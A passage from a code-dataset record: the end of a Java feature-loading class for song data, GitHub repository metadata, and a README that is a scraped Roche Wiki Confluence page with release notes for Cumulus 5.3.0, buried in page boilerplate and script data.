{\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tnew String[] { song.get_artist_uri() });\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase ALBUM_ID: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tnew String[] { song.get_album_uri() });\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase TRACK_NAME: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tsong.get_track_name());\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\n\t\t\t\t\tcase DURATION: {\n\t\t\t\t\t\tthis.dataParsed.songFeatures.get(featureName).addRow(i,\n\t\t\t\t\t\t\t\tnew MLSparseVector(new int[] { 0 },\n\t\t\t\t\t\t\t\t\t\tnew float[] { TimeUnit.MILLISECONDS\n\t\t\t\t\t\t\t\t\t\t\t\t.toSeconds(song\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t.get_duration_ms()) },\n\t\t\t\t\t\t\t\t\t\tnull, 1));\n\t\t\t\t\t\tbreak;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tint cur = count.incrementAndGet();\n\t\t\tif (cur % 100_000 == 0) {\n\t\t\t\ttimer.tocLoop(cur);\n\t\t\t}\n\t\t}\n\t\t// });\n\t\ttimer.tocLoop(count.get());\n\n\t\tfor (SongFeature featureName : SongFeature.values()) {\n\t\t\t// finalize feature, apply transforms but preserve original data\n\t\t\tthis.dataParsed.songFeatures.get(featureName).finalizeFeature(true);\n\t\t}\n\n\t}\n\n\tpublic void loadSongExtraInfo(final String inFile) throws Exception {\n\t\tMLTimer timer = new MLTimer(\"loadSongExtraInfo\");\n\t\ttimer.tic();\n\n\t\tMap<String, Integer> songToIndexMap = new HashMap<String, Integer>();\n\t\tfor (int i = 0; i < this.dataParsed.songIds.length; i++) {\n\t\t\tsongToIndexMap.put(this.dataParsed.songIds[i], i);\n\t\t}\n\n\t\tthis.dataParsed.songExtraInfoFeatures = new HashMap<SongExtraInfoFeature, MLSparseFeature>();\n\t\tfor (SongExtraInfoFeature featureName : SongExtraInfoFeature.values()) {\n\t\t\tMLFeatureTransform[] featTransforms = new MLFeatureTransform[] {\n\t\t\t\t\tnew MLFeatureTransform.ColSelectorTransform(1_000) 
};\n\n\t\t\tMLSparseFeature feature = new MLSparseFeature(\n\t\t\t\t\tthis.dataParsed.songIds.length, null, featTransforms,\n\t\t\t\t\tMLSparseMatrixAOO.class);\n\t\t\tthis.dataParsed.songExtraInfoFeatures.put(featureName, feature);\n\t\t}\n\n\t\tJSONParser parser = new JSONParser(JSONParser.USE_INTEGER_STORAGE);\n\t\tAtomicInteger count = new AtomicInteger(0);\n\t\ttry (BufferedReader reader = new BufferedReader(\n\t\t\t\tnew FileReader(inFile))) {\n\t\t\tJSONArray parsed = (JSONArray) parser.parse(reader);\n\t\t\tfor (Object element : parsed) {\n\t\t\t\tif (element == null\n\t\t\t\t\t\t|| ((JSONObject) element).containsKey(\"uri\") == false) {\n\t\t\t\t\tcontinue;\n\t\t\t\t}\n\n\t\t\t\tString songId = ((JSONObject) element).getAsString(\"uri\");\n\t\t\t\tint songIndex = songToIndexMap.get(songId);\n\n\t\t\t\tint cur = count.incrementAndGet();\n\t\t\t\tif (cur % 100_000 == 0) {\n\t\t\t\t\ttimer.tocLoop(cur);\n\t\t\t\t}\n\n\t\t\t\tfor (SongExtraInfoFeature feature : SongExtraInfoFeature\n\t\t\t\t\t\t.values()) {\n\t\t\t\t\tif (((JSONObject) element)\n\t\t\t\t\t\t\t.containsKey(feature.name()) == false\n\t\t\t\t\t\t\t|| ((JSONObject) element)\n\t\t\t\t\t\t\t\t\t.get(feature.name()) == null) {\n\t\t\t\t\t\tcontinue;\n\t\t\t\t\t}\n\n\t\t\t\t\tif (feature.equals(SongExtraInfoFeature.key) == true) {\n\t\t\t\t\t\tthis.dataParsed.songExtraInfoFeatures.get(feature)\n\t\t\t\t\t\t\t\t.addRow(songIndex,\n\t\t\t\t\t\t\t\t\t\t((JSONObject) element)\n\t\t\t\t\t\t\t\t\t\t\t\t.getAsNumber(feature.name())\n\t\t\t\t\t\t\t\t\t\t\t\t.intValue() + \"\");\n\n\t\t\t\t\t} else {\n\t\t\t\t\t\tfloat value = ((JSONObject) element)\n\t\t\t\t\t\t\t\t.getAsNumber(feature.name()).floatValue();\n\t\t\t\t\t\tthis.dataParsed.songExtraInfoFeatures.get(feature)\n\t\t\t\t\t\t\t\t.addRow(songIndex,\n\t\t\t\t\t\t\t\t\t\tnew MLSparseVector(new int[] { 0 },\n\t\t\t\t\t\t\t\t\t\t\t\tnew float[] { value }, 
null,\n\t\t\t\t\t\t\t\t\t\t\t\t1));\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\ttimer.tocLoop(count.get());\n\n\t\tfor (SongExtraInfoFeature featureName : SongExtraInfoFeature.values()) {\n\t\t\t// finalize feature, apply transforms but preserve original data\n\t\t\tthis.dataParsed.songExtraInfoFeatures.get(featureName)\n\t\t\t\t\t.finalizeFeature(true);\n\t\t}\n\t}\n\n}\n" } ]
14
ShubhamGoel/test
https://github.com/ShubhamGoel/test
fe237fc8d5ef743f7716ba33a39bc57d31bec36e
912c2aea4040b1dd96d5ad73d93efff5755b6fcc
3df7c6a47f521fb48562ecd2a6609cb06aad41fa
refs/heads/master
2020-12-04T07:28:22.184061
2020-07-30T05:43:49
2020-07-30T05:43:49
231,677,625
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6545789837837219, "alphanum_fraction": 0.7680014967918396, "avg_line_length": 112.71505737304688, "blob_id": "ead74d58d01fef015e79a73d9a399cdd6428171f", "content_id": "f61c64a163dee3a74c6de1876388fcdf83c510c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 21161, "license_type": "no_license", "max_line_length": 12361, "num_lines": 186, "path": "/README.md", "repo_name": "ShubhamGoel/test", "src_encoding": "UTF-8", "text": "Cumulus 5.3.0- Release Notes - Roche Sequencing Solutions - Roche Wiki var contextPath = '/confluence'; .ia-fixed-sidebar, .ia-splitter-left {width: 285px;}.theme-default .ia-splitter #main {margin-left: 285px;}.ia-fixed-sidebar {visibility: hidden;} window.WRM=window.WRM||{};window.WRM.\\_unparsedData=window.WRM.\\_unparsedData||{};window.WRM.\\_unparsedErrors=window.WRM.\\_unparsedErrors||{}; WRM.\\_unparsedData\\[\"com.atlassian.plugins.atlassian-plugins-webresource-plugin:context-path.context-path\"\\]=\"\\\\u0022\\\\u005C/confluence\\\\u0022\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-hipchat-integration-plugin:discovery-javascript-data.link-active\"\\]=\"{\\\\u0022linkActive\\\\u0022:false,\\\\u0022conditionsMet\\\\u0022:false,\\\\u0022admin\\\\u0022:false}\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-feature-discovery-plugin:confluence-feature-discovery-plugin-resources.test-mode\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.analytics.analytics-client:policy-update-init.policy-update-data-provider\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.analytics.analytics-client:programmatic-analytics-init.programmatic-analytics-data-provider\"\\]=\"false\"; 
WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.applinks-help-paths\"\\]=\"{\\\\u0022entries\\\\u0022:{\\\\u0022applinks.docs.root\\\\u0022:\\\\u0022https://confluence.atlassian.com/display/APPLINKS-054/\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.sslunmatched\\\\u0022:\\\\u0022SSL+and+application+link+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.oauthsignatureinvalid\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.oauthtimestamprefused\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.delete.entity.link\\\\u0022:\\\\u0022Create+links+between+projects\\\\u0022,\\\\u0022applinks.docs.adding.application.link\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.administration.guide\\\\u0022:\\\\u0022Application+Links+Documentation\\\\u0022,\\\\u0022applinks.docs.oauth.security\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.troubleshoot.application.links\\\\u0022:\\\\u0022Troubleshoot+application+links\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.unknownerror\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.configuring.auth.trusted.apps\\\\u0022:\\\\u0022Configuring+Trusted+Applications+authentication+for+an+application+link\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.authlevelunsupported\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.ssluntrusted\\\\u0022:\\\\u0022SSL+and+application+link+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.unknownhost\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.delete.application.link\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.link.
applications\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.oauthproblem\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.migration\\\\u0022:\\\\u0022Update+application+links+to+use+OAuth\\\\u0022,\\\\u0022applinks.docs.relocate.application.link\\\\u0022:\\\\u0022Link+Atlassian+applications+to+work+together\\\\u0022,\\\\u0022applinks.docs.administering.entity.links\\\\u0022:\\\\u0022Create+links+between+projects\\\\u0022,\\\\u0022applinks.docs.upgrade.application.link\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.connectionrefused\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.configuring.auth.oauth\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.insufficient.remote.permission\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.configuring.application.link.auth\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.diagnostics\\\\u0022:\\\\u0022Application+links+diagnostics\\\\u0022,\\\\u0022applinks.docs.configured.authentication.types\\\\u0022:\\\\u0022OAuth+security+for+application+links\\\\u0022,\\\\u0022applinks.docs.adding.entity.link\\\\u0022:\\\\u0022Create+links+between+projects\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.unexpectedresponse\\\\u0022:\\\\u0022Network+and+connectivity+troubleshooting+guide\\\\u0022,\\\\u0022applinks.docs.configuring.auth.basic\\\\u0022:\\\\u0022Configuring+Basic+HTTP+Authentication+for+an+Application+Link\\\\u0022,\\\\u0022applinks.docs.diagnostics.troubleshoot.authlevelmismatch\\\\u0022:\\\\u0022OAuth+troubleshooting+guide\\\\u0022}}\"; 
WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.applinks-types\"\\]=\"{\\\\u0022crowd\\\\u0022:\\\\u0022Crowd\\\\u0022,\\\\u0022confluence\\\\u0022:\\\\u0022Confluence\\\\u0022,\\\\u0022fecru\\\\u0022:\\\\u0022FishEye / Crucible\\\\u0022,\\\\u0022stash\\\\u0022:\\\\u0022Bitbucket Server\\\\u0022,\\\\u0022jira\\\\u0022:\\\\u0022Jira\\\\u0022,\\\\u0022refapp\\\\u0022:\\\\u0022Reference Application\\\\u0022,\\\\u0022bamboo\\\\u0022:\\\\u0022Bamboo\\\\u0022,\\\\u0022generic\\\\u0022:\\\\u0022Generic Application\\\\u0022}\"; WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.entity-types\"\\]=\"{\\\\u0022singular\\\\u0022:{\\\\u0022refapp.charlie\\\\u0022:\\\\u0022Charlie\\\\u0022,\\\\u0022fecru.project\\\\u0022:\\\\u0022Crucible Project\\\\u0022,\\\\u0022fecru.repository\\\\u0022:\\\\u0022FishEye Repository\\\\u0022,\\\\u0022stash.project\\\\u0022:\\\\u0022Bitbucket Server Project\\\\u0022,\\\\u0022generic.entity\\\\u0022:\\\\u0022Generic Project\\\\u0022,\\\\u0022confluence.space\\\\u0022:\\\\u0022Confluence Space\\\\u0022,\\\\u0022bamboo.project\\\\u0022:\\\\u0022Bamboo Project\\\\u0022,\\\\u0022jira.project\\\\u0022:\\\\u0022Jira Project\\\\u0022},\\\\u0022plural\\\\u0022:{\\\\u0022refapp.charlie\\\\u0022:\\\\u0022Charlies\\\\u0022,\\\\u0022fecru.project\\\\u0022:\\\\u0022Crucible Projects\\\\u0022,\\\\u0022fecru.repository\\\\u0022:\\\\u0022FishEye Repositories\\\\u0022,\\\\u0022stash.project\\\\u0022:\\\\u0022Bitbucket Server Projects\\\\u0022,\\\\u0022generic.entity\\\\u0022:\\\\u0022Generic Projects\\\\u0022,\\\\u0022confluence.space\\\\u0022:\\\\u0022Confluence Spaces\\\\u0022,\\\\u0022bamboo.project\\\\u0022:\\\\u0022Bamboo Projects\\\\u0022,\\\\u0022jira.project\\\\u0022:\\\\u0022Jira Projects\\\\u0022}}\"; 
WRM.\\_unparsedData\\[\"com.atlassian.applinks.applinks-plugin:applinks-common-exported.authentication-types\"\\]=\"{\\\\u0022com.atlassian.applinks.api.auth.types.BasicAuthenticationProvider\\\\u0022:\\\\u0022Basic Access\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.TrustedAppsAuthenticationProvider\\\\u0022:\\\\u0022Trusted Applications\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.CorsAuthenticationProvider\\\\u0022:\\\\u0022CORS\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.OAuthAuthenticationProvider\\\\u0022:\\\\u0022OAuth\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.TwoLeggedOAuthAuthenticationProvider\\\\u0022:\\\\u0022OAuth\\\\u0022,\\\\u0022com.atlassian.applinks.api.auth.types.TwoLeggedOAuthWithImpersonationAuthenticationProvider\\\\u0022:\\\\u0022OAuth\\\\u0022}\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.synchrony-interop:synchrony-status-banner-loader.synchrony-status\"\\]=\"false\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-license-banner:confluence-license-banner-resources.license-details\"\\]=\"{\\\\u0022daysBeforeLicenseExpiry\\\\u0022:0,\\\\u0022daysBeforeMaintenanceExpiry\\\\u0022:0,\\\\u0022showLicenseExpiryBanner\\\\u0022:false,\\\\u0022showMaintenanceExpiryBanner\\\\u0022:false,\\\\u0022renewUrl\\\\u0022:null,\\\\u0022salesEmail\\\\u0022:null}\"; WRM.\\_unparsedData\\[\"com.atlassian.confluence.plugins.confluence-search-ui-plugin:confluence-search-ui-plugin-resources.i18n-data\"\\]=\"{\\\\u0022search.ui.recent.link.text\\\\u0022:\\\\u0022View more recently visited\\\\u0022,\\\\u0022search.ui.filter.space.category.input.label\\\\u0022:\\\\u0022Find space categories...\\\\u0022,\\\\u0022search.ui.filter.clear.selected\\\\u0022:\\\\u0022Clear selected items\\\\u0022,\\\\u0022search.ui.search.results.empty\\\\u0022:\\\\u0022We couldn\\\\u005Cu0027\\\\u005Cu0027t find anything matching 
\\\\u005C\\\\u0022{0}\\\\u005C\\\\u0022.\\\\u0022,\\\\u0022search.ui.content.name.search.items.panel.load.all.top.items.button.text\\\\u0022:\\\\u0022Show more app results...\\\\u0022,\\\\u0022search.ui.filter.space.archive.label\\\\u0022:\\\\u0022Search archived spaces\\\\u0022,\\\\u0022search.ui.filter.label\\\\u0022:\\\\u0022filter\\\\u0022,\\\\u0022search.ui.filter.contributor.button.text\\\\u0022:\\\\u0022Contributor\\\\u0022,\\\\u0022search.ui.filter.date.all.text\\\\u0022:\\\\u0022Any time\\\\u0022,\\\\u0022search.ui.filter.space.current.label\\\\u0022:\\\\u0022CURRENT\\\\u0022,\\\\u0022search.ui.clear.input.button.text\\\\u0022:\\\\u0022Clear text\\\\u0022,\\\\u0022help.search.ui.link.title\\\\u0022:\\\\u0022Search tips\\\\u0022,\\\\u0022search.ui.search.results.clear.button\\\\u0022:\\\\u0022clear your filters.\\\\u0022,\\\\u0022search.ui.filter.date.hour.text\\\\u0022:\\\\u0022The past day\\\\u0022,\\\\u0022search.ui.filters.heading\\\\u0022:\\\\u0022Filter by\\\\u0022,\\\\u0022search.ui.filter.label.input.label\\\\u0022:\\\\u0022Find labels...\\\\u0022,\\\\u0022search.ui.filter.date.month.text\\\\u0022:\\\\u0022The past month\\\\u0022,\\\\u0022search.ui.recent.items.anonymous\\\\u0022:\\\\u0022Start exploring. 
Your search results will appear here.\\\\u0022,\\\\u0022search.ui.input.label\\\\u0022:\\\\u0022Search\\\\u0022,\\\\u0022search.ui.search.result\\\\u0022:\\\\u0022{0,choice,1#{0} search result|1\\\\u005Cu003c{0} search results}\\\\u0022,\\\\u0022search.ui.infinite.scroll.button.text\\\\u0022:\\\\u0022More results\\\\u0022,\\\\u0022search.ui.filter.date.button.text\\\\u0022:\\\\u0022Date\\\\u0022,\\\\u0022search.ui.filter.date.week.text\\\\u0022:\\\\u0022The past week\\\\u0022,\\\\u0022search.ui.filter.label.button.text\\\\u0022:\\\\u0022Label\\\\u0022,\\\\u0022search.ui.input.alert\\\\u0022:\\\\u0022Hit enter to search\\\\u0022,\\\\u0022search.ui.filter.no.result.text\\\\u0022:\\\\u0022We can\\\\u005Cu0027\\\\u005Cu0027t find anything matching your search\\\\u0022,\\\\u0022search.ui.result.subtitle.calendar\\\\u0022:\\\\u0022Team calendar\\\\u0022,\\\\u0022search.ui.filter.date.heading\\\\u0022:\\\\u0022Last modified within\\\\u0022,\\\\u0022search.ui.result.subtitle.user\\\\u0022:\\\\u0022User profile\\\\u0022,\\\\u0022search.ui.filter.contributor.input.label\\\\u0022:\\\\u0022Find people...\\\\u0022,\\\\u0022search.ui.filter.content.type.button.text\\\\u0022:\\\\u0022Type\\\\u0022,\\\\u0022search.ui.filter.space.input.label\\\\u0022:\\\\u0022Find spaces...\\\\u0022,\\\\u0022search.ui.filter.date.year.text\\\\u0022:\\\\u0022The past year\\\\u0022,\\\\u0022search.ui.filter.space.button.text\\\\u0022:\\\\u0022Space\\\\u0022,\\\\u0022search.ui.advanced.search.link.text\\\\u0022:\\\\u0022Advanced search\\\\u0022,\\\\u0022search.ui.generic.error\\\\u0022:\\\\u0022Something went wrong. 
Refresh the page, or contact your admin if this keeps happening.\\\\u0022,\\\\u0022search.ui.recent.spaces\\\\u0022:\\\\u0022Recent Spaces\\\\u0022,\\\\u0022search.ui.search.results.clear.line2\\\\u0022:\\\\u0022Try a different search term or\\\\u0022,\\\\u0022search.ui.filter.space.category.button.text\\\\u0022:\\\\u0022Space category\\\\u0022,\\\\u0022search.ui.search.results.clear.line1\\\\u0022:\\\\u0022We couldn\\\\u005Cu0027\\\\u005Cu0027t find anything matching your search.\\\\u0022,\\\\u0022search.ui.content.name.search.items.panel.load.all.top.items.admin.button.text\\\\u0022:\\\\u0022Show more settings and app results...\\\\u0022,\\\\u0022search.ui.recent.pages\\\\u0022:\\\\u0022Recently visited\\\\u0022,\\\\u0022search.ui.search.result.anonymous\\\\u0022:\\\\u0022{0,choice,1#{0} search result|1\\\\u005Cu003c{0} search results}. Have an account? {1}Log in{2} to expand your search.\\\\u0022,\\\\u0022search.ui.recent.items.empty\\\\u0022:\\\\u0022Start exploring. Pages and spaces you\\\\u005Cu0027\\\\u005Cu0027ve visited recently will appear here.\\\\u0022,\\\\u0022search.ui.result.subtitle.space\\\\u0022:\\\\u0022Space\\\\u0022,\\\\u0022search.ui.filter.space.init.heading\\\\u0022:\\\\u0022recent spaces\\\\u0022}\"; WRM.\\_unparsedData\\[\"com.atlassian.whisper.atlassian-whisper-plugin:atlassian-whisper-bootstrap.WhisperData\"\\]=\"{\\\\u0022hasMessages\\\\u0022:true,\\\\u0022syncInit\\\\u0022:false,\\\\u0022userEmail\\\\u0022:\\\\[email protected]\\\\u0022,\\\\u0022baseUrl\\\\u0022:\\\\u0022https:\\\\u005C/\\\\u005C/rochewiki.roche.com\\\\u005C/confluence\\\\u0022}\"; if(window.WRM.\\_dataArrived)window.WRM.\\_dataArrived(); \n\nIMPORTANT: IMPORTANT: 6th January is a national holiday and the DevTools Team is out of office. We will resume work on Tuesday, 7th January. 
\nIn case of critical issues, call +48 61 279 3485.\n\nwindow.dataLayer = window.dataLayer || \\[\\]; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-134494057-1'); \n\n* [Skip to content](#title-heading)\n* [Skip to breadcrumbs](#breadcrumbs)\n* [Skip to header menu](#header-menu-bar)\n* [Skip to action menu](#navigation)\n* [Skip to quick search](#quick-search-query)\n\n[Linked Applications](#app-switcher)\n\nLoading…\n\n[Roche Wiki](/confluence/)\n==========================\n\n* [Spaces](/confluence/spacedirectory/view.action \"Spaces\")\n* [People](/confluence/browsepeople.action \"People\")\n* [Questions](/confluence/qa/questions)\n* [Create](# \"Create from template\")\n\n* Hit enter to search\n \n* [Help](# \"Help\")\n \n * [Online Help](https://docs.atlassian.com/confluence/docs-615/ \"Visit the Confluence documentation home\")\n * [Keyboard Shortcuts](/confluence \"View available keyboard shortcuts\")\n * [Feed Builder](/confluence/dashboard/configurerssfeed.action \"Create your custom RSS feed.\")\n * [What’s new](https://confluence.atlassian.com/display/DOC/Confluence+6.15+Release+Notes?a=false)\n * [Available Gadgets](/confluence \"Browse gadgets provided by Confluence\")\n * [About Confluence](/confluence/aboutconfluencepage.action \"Get more information about Confluence\")\n \n\n* [\n \n ](# \"Goel, Shubham {DMSL~Santa Clara}\")\n \n * [Add personal space…](/confluence/spaces/createpersonalspace.action)\n * [Recently viewed](/confluence/users/viewuserhistory.action)\n * [Recently worked on](/confluence/dashboard.action#recently-worked)\n \n * [Profile](/confluence/users/viewmyprofile.action)\n * [Tasks](/confluence/plugins/inlinetasks/mytasks.action)\n * [Saved for later](/confluence/users/viewmyfavourites.action)\n * [Watches](/confluence/users/viewnotifications.action)\n * [Drafts](/confluence/users/viewmydrafts.action)\n * [Network](/confluence/users/viewfollow.action?username=goels1)\n * 
[Settings](/confluence/users/viewmysettings.action)\n \n * [Log Out](/confluence/logout.action)\n \n\n \n\n[![Roche Sequencing Solutions](/confluence/download/attachments/280833218/RSS?version=3&modificationDate=1431532538000&api=v2)](/confluence/display/RSS/Roche+Sequencing+Solutions+Home+Page \"Roche Sequencing Solutions\")\n\n[Roche Sequencing Solutions](/confluence/display/RSS/Roche+Sequencing+Solutions+Home+Page \"Roche Sequencing Solutions\")\n\n* [Blog](/confluence/pages/viewrecentblogposts.action?key=RSS)\n* [Questions](/confluence/display/RSS/qa/questions)\n\n##### Space shortcuts\n\n* [HTP Gen 1.1 Project](/confluence/display/RSS/HTP+Gen+1.1+Project)\n* [E2E Systems Development](/confluence/display/RSS/E2E+Systems+Development)\n* [Sub Project Team (SPT) Focus Areas](/confluence/display/RSS/Sub+Project+Team+%28SPT%29+Focus+Areas)\n* [Blaze System - NIPT on Nanopore Program](/confluence/display/RSS/Blaze+System+-+NIPT+on+Nanopore+Program)\n* [RSS Confluence How-To's and General Usage Information](/confluence/display/RSS/RSS+Confluence+How-To%27s+and+General+Usage+Information)\n* [RSS Confluence FAQ page](/confluence/display/RSS/RSS+Confluence+FAQ+page)\n* [How-to articles](/confluence/display/RSS/How-to+articles)\n* [File lists](/confluence/display/RSS/File+lists)\n* [Meeting notes](/confluence/display/RSS/Meeting+notes)\n\n##### Page tree\n\n \n\n \n\n[](/confluence/collector/pages.action?key=RSS)<h2>Space Details</h2><div class=\"personal-space-logo-hint\">Your profile picture is used as the logo for your personal space. 
<a href=\"/confluence/users/profile/editmyprofilepicture.action\" target=\"\\_blank\">Change your profile picture</a>.</div>\n\nBrowse pages\n\nConfigureSpace tools\n\n* [Save for later](/confluence \"Save for later\")\n* [Watch](/confluence \"Watch (w)\")\n* [Share](/confluence \"Share this page with others\")\n* [](#)\n \n * [Attachments (3)](/confluence/pages/viewpageattachments.action?pageId=454201150 \"View Attachments\")\n * [Page History](/confluence/pages/viewpreviousversions.action?pageId=454201150)\n * [Restrictions](/confluence/pages/viewinfo.action?pageId=454201150 \"Edit restrictions\")\n \n * [Page Information](/confluence/pages/viewinfo.action?pageId=454201150)\n * [Resolved comments](/confluence)\n * [View in Hierarchy](/confluence/pages/reorderpages.action?key=RSS&openId=454201150#selectedPageInHierarchy)\n * [View Source](/confluence/plugins/viewsource/viewpagesrc.action?pageId=454201150)\n * [Export to PDF](/confluence/spaces/flyingpdf/pdfpageexport.action?pageId=454201150)\n * [Export to Word](/confluence/exportword?pageId=454201150)\n \n * [Copy](/confluence/pages/copypage.action?idOfPageToCopy=454201150&spaceKey=RSS)\n \n\n1. [Dashboard](/confluence/collector/pages.action?key=RSS)\n2. **…**\n3. [Roche Sequencing Solutions Home Page](/confluence/display/RSS/Roche+Sequencing+Solutions+Home+Page)\n4. [Roche Sequencing Solutions Home](/confluence/display/RSS/Roche+Sequencing+Solutions+Home)\n5. [(SBI) Software & BioInformatics](/confluence/pages/viewpage.action?pageId=328412130)\n6. [Nanopore Sequencing Software](/confluence/display/RSS/Nanopore+Sequencing+Software)\n7. [Cloud & Analysis](/confluence/pages/viewpage.action?pageId=329557564)\n8. [Release Notes](/confluence/display/RSS/Release+Notes)\n9. 
[Cumulus Release Notes](/confluence/display/RSS/Cumulus+Release+Notes)\n\n[Skip to end of banner](#page-banner-end)\n\n* Jira links\n\n[Go to start of banner](#page-banner-start)\n\n[Cumulus 5.3.0- Release Notes](/confluence/display/RSS/Cumulus+5.3.0-+Release+Notes)\n====================================================================================\n\n<table class=\"aui\"> <thead> <tr class=\"header\"> <th class=\"search-result-title\">Page Title</th> <th class=\"search-result-space\">Space</th> <th class=\"search-result-date\">Updated</th> </tr> </thead> </table> <p class=\"search-result-count\">{0}</p> <tr class=\"search-result\"> <td class=\"search-result-title\"><a href=\"{1}\" class=\"content-type-{2}\"><span>{0}</span></a></td> <td class=\"search-result-space\"><a class=\"space\" href=\"/confluence/display/{4}/\" title=\"{3}\">{3}</a></td> <td class=\"search-result-date\"><span class=\"date\" title=\"{6}\">{5}</span></td> </tr> [Skip to end of metadata](#page-metadata-end)\n\n* Created by [Gairola, Ankit {DMSL~Santa Clara}]( /confluence/display/~gairolaa\n ), last modified on [Dec 23, 2019](/confluence/pages/diffpagesbyversion.action?pageId=454201150&selectedPageVersions=1&selectedPageVersions=2 \"Show changes\")\n\n[Go to start of metadata](#page-metadata-start)\n\nRelease Date: 23 Dec 2019\n\nCumulus 5.3.0 release version will have the following features:\n\n**Run Refresh Feature**\n\n* User can now Refresh the run manually using this feature\n\n![](/confluence/download/attachments/454201150/Screenshot%202019-12-17%20at%207.15.47%20PM.png?version=1&modificationDate=1577114262000&api=v2)![](/confluence/download/attachments/454201150/Screenshot%202019-12-17%20at%207.09.13%20PM.png?version=1&modificationDate=1577114257000&api=v2)\n\n**RunType Drop-Down in Create token page**\n\n* Added new Drop-down in create token 
page.\n\n![](/confluence/download/attachments/454201150/Screenshot%202019-12-23%20at%208.52.14%20PM.png?version=1&modificationDate=1577114688000&api=v2)\n\n \n\n \n\nFor any queries, please post through the Feedback button or directly post to #cumulus-bugs slack channel.\n\nRegards, \nCumulus Team\n\n \n\n \n\n* No labels\n* [Edit Labels](# \"Edit Labels\")\n\n[![User icon: Add a picture of yourself](/confluence/s/en_US/8100/5084f018d64a97dc638ca9a178856f851ea353ff/_/images/icons/profilepics/add_profile_pic.svg)](/confluence/users/profile/editmyprofilepicture.action \"Add a picture of yourself\")\n\nWrite a comment…\n\n[Add Comment](/confluence/display/RSS/Cumulus+5.3.0-+Release+Notes?showComments=true&showCommentArea=true#addcomment)\n\nOverview\n\nContent Tools\n\nActivity\n\n* Powered by [Atlassian Confluence](http://www.atlassian.com/software/confluence) 6.15.9\n* Printed by Atlassian Confluence 6.15.9\n* [Report a bug](https://support.atlassian.com/help/confluence)\n* [Atlassian News](http://www.atlassian.com/about/connected.jsp?s_kwcid=Confluence-stayintouch)\n\n[Atlassian](http://www.atlassian.com/)\n\n{\"serverDuration\": 146, \"requestCorrelationId\": \"736db0e34978e6d9\"} AJS.BigPipe = AJS.BigPipe || {}; AJS.BigPipe.metrics = AJS.BigPipe.metrics || {}; AJS.BigPipe.metrics.pageEnd = typeof window.performance !== \"undefined\" && typeof window.performance.now === \"function\" ? 
